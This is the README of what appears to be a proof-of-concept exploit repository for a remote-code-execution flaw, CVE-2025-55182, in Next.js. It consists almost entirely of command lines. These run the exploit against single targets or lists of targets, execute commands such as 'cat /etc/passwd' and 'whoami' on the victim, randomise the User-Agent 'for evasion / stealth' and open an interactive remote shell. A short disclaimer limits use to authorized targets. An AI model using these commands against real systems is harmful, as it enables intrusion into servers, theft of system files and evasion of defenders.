This repository provides a working proof-of-concept for CVE-2025-55182, an RCE affecting some deployments of Next.js. The tool opens an interactive shell prompt on exploitation, enabling security researchers to test and verify exploitability. Use responsibly and only on authorized targets.
# Getting Started
git clone https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell/
cd /CVE-2025-55182-React2Shell-RCE-Shell/
python3 CVE-2025-55182-exploit.py
# Single target (default mode)
python3 CVE-2025-55182-exploit.py -u http://target.com
# Target on localhost + specify callback / proxy URL (if applicable)
python3 CVE-2025-55182-exploit.py -u http://localhost:3000 -p http://127.0.0.1:8080
# Use HTTPS target and skip certificate verification (if applicable)
python3 CVE-2025-55182-exploit.py -u https://target.com -k
# Batch mode: supply list of targets (one per line)
python3 CVE-2025-55182-exploit.py -l targets.txt
# Custom command execution on target
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "id"
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd"
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "uname -a" -v
# Provide additional headers if needed (e.g. custom cookies)
python3 CVE-2025-55182-exploit.py -u http://target.com -H "Cookie: session=abc123" --custom "ps aux"
# Batch + custom commands (multiple commands separated with semicolon)
python3 CVE-2025-55182-exploit.py -l targets.txt --custom "whoami; id; pwd"
# Only output the payload without executing (payload-only mode)
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd" --payload-only
# Use a random User-Agent header for evasion / stealth
python3 CVE-2025-55182-exploit.py -u http://target.com --random-agent
python3 CVE-2025-55182-exploit.py -l targets.txt --random-agent -k
# Interactive shell mode (if exploit succeeds)
python3 CVE-2025-55182-exploit.py -u http://target.com --shell